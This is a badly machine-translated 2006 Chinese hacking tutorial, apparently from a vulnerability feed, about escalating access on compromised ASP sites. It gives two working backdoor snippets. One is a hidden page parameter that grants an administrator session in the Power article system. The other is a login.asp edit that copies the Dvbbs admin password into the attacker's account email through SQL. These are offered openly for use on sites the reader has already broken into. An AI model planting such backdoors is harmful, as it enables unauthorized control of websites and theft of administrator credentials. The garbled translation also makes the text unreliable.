The use of ASP Trojan horse to enhance the highest authority-vulnerability warning-the black bar safety net

ID MYHACK58:6220066698
Type myhack58
Reporter 佚名
Modified 2006-01-25T00:00:00



Some time ago the proliferation of dynamic network Forum upload vulnerability and the recent spate of a variety of asp systems exposed upload vulnerability, may be a lot of friends hands with a lot of webshell broiler, as choose how these Chicks are also vary from person to person, someone to continue the elevation, the further the invasion, it was also just see the horses put up too, just forgot, there are also some friends, when the webshell fresh strength in the past of the background to the mystery and Allure will greatly increase.

In fact, the very powerful system, get to the back that is got a good back door, but now compare the new version a lot of the asp system passwords are MD5 encrypted and then with strict verification procedures to verify, but we have no way to break through these limits? no! I today is to say how to break through these restrictions let's go straight to the back, there are horse stables is better to do follow me............

session spoof article

First briefly about the General asp system of the authentication principle. In General, the backend administrator login page enter the account password, the program will take him to submit a user name and password to the database administrator table to find if there is this person's account password, you think that you are the administrator, then give you a representation of your identity in the session value. Or program to put your user name and password is extracted, and then to the database administrator to the table surface to remove the administrator account password you submitted is compared, and if equal, keep up with the surface as giving you a representation of your identity sesion value. Then you go into any Admin page it must first verify that your session value, if the administrator will let you through, not the words will guide you back to the login page or show some weird warning, these are related to the programmer's personal preference related.

Know principle, we are now one of the ideas is through our asp Trojan to modify its program and then get an admin session, so although we do not have the administrator password, but like us in the background unhindered access. I put this method is called session spoofing. Limited space not every system can be described in detail herein only to the power of the article system as an example to illustrate.

Power articles system 3. 5 1, The figure of a !

Figure a

In fact, the power of the article system all version all pass to kill, including moving easy. Everyone can be their own practice.

We first take a look at it to verify the content. Power Article 3. 5 1 of the verification page in Admin_ChkLogin. asp, which verifies the content as follows:

............ else rs("LastLoginIP")=Request. ServerVariables("REMOTE_ADDR") rs("LastLoginTime")=now() rs("LoginTimes")=rs("LoginTimes")+1 rs. update session. Timeout=SessionTimeout session("AdminName")=rs("username") rs. close set rs=nothing call CloseConn() Response. Redirect "Admin_Index. asp"

The front of the ellipsis is the user name the password is incorrect, authentication, until else, look if the username password is correct it gives you two session values:

session. Timeout=SessionTimeout session("AdminName")=rs("username")

We look at other management page is how to verify the session, admin_index. asp a start on this:

There seems to be very tight, but we look at it here to value verify a AdminName session, as long as our session content is AdminName while not you can pass? Well, we started, first go to get it the administrator account then again, this don't I teach you? To his website around it or directly download it in the database view may know. We're looking for a page to change, I'm looking for a relatively nobody and the more content of the page FriendSite. asp(the link of the page to change, Oh, this way, the administrator is also very difficult to find out. With the asp Trojan of the editing function to edit its content. On his page under the shelter plus the following few words:

dim id id=trim(request("qwe")) if id="1 2 0" then session("AdminName")="admin" ‘here is hypothetical, the actual operation can be changed to you want to get the administrator account end if

I simply look the meaning of the phrase, that is to say from the address bar made hehe a value, if hehe=1 2 0, Then the system will give us a value for the admin session. Well, we look at that figure two:


Figure II

See anything unusual?, no? Or a normal page, but our then in the address bar enter the IT management background home to look at, isn't it in there? Figure three:


Figure three

Oh, don't do bad things Oh............

Summary: we first find get administrator account, and then find it on the verification page, based on its verification of the content to write to us to the back door. Different systems have different authentication methods, such as green to create the article system it is not only to verify your user name also to verify the level, but our General idea is still the same, that is, he verifies what we added what.

**Code theft probe article

** You can say that the methods in the dynamic web forum or other forums before is feeble, because the General Forum due to the interaction of the stronger sex, so the validation on the consider a lot. To the moving network, for example, you want to log in the background, he to verify you have to sign in at the front Desk, no words will give you return an error page. You sign in at the front Desk after the system will give you a seession to record your CacheName and your ID, and then in your logon background for the time to come up with to compare your before and after Station whether the identity is consistent, always on, or kill, in the face of such strict validation, don't we there is no way to group the background? Yeah, not a who take the eggs to throw at me? So waste., the But we can think a new way, since authentication is so strict, then if I get the password for the above Board get in? Therefore, here a new idea is to take it to the plaintext password. When have the plaintext password? By the way, in the admin login. Well, we're there to mess about, to put it the logon password to us, then we get and it's password to log in. Oh, is not very like sniffer? In the first few months just and fraternal latent dragon in the wild use a hardware sniffer with the province of the Network Security Bureau of the people end off an illegal movie site, the full 4000G hard disk, dozens of servers, in a word: cool

Well, we began to modify its program. Edit login. asp, add the following few words:

if not isnull(trim(request("username"))) then if request("username")="admin" then sql="update [Dv_Vser] set UserEmail=(select userpassword from [Dv_User] where username='"& request("username")&"') where UserName='aweige'" conn. execute(sql) end if end if

This a few words mean, if the admin assuming, the actual operation to your administrator name successful login will update the database, put his password on my information E-mail. Of course, you must first in the forum to register a username. The results are shown in Figure four:


Figure four

Also, if it is to move the web 7. 0 the following default database admin table name and 7. 0 more than a little different, so the actual operation can not be applied mechanically to.

PostScript: the

For the above two methods until now I also can't think of any more effective solution, because your site is people put a horse, you simply have no way to prevent people to insert, if anyone have better solution remember to tell me.

In addition, I hope you don't go to vandalize, then I really want to see, also good luck to all of the NMS have good luck, I hope you won't run into craker.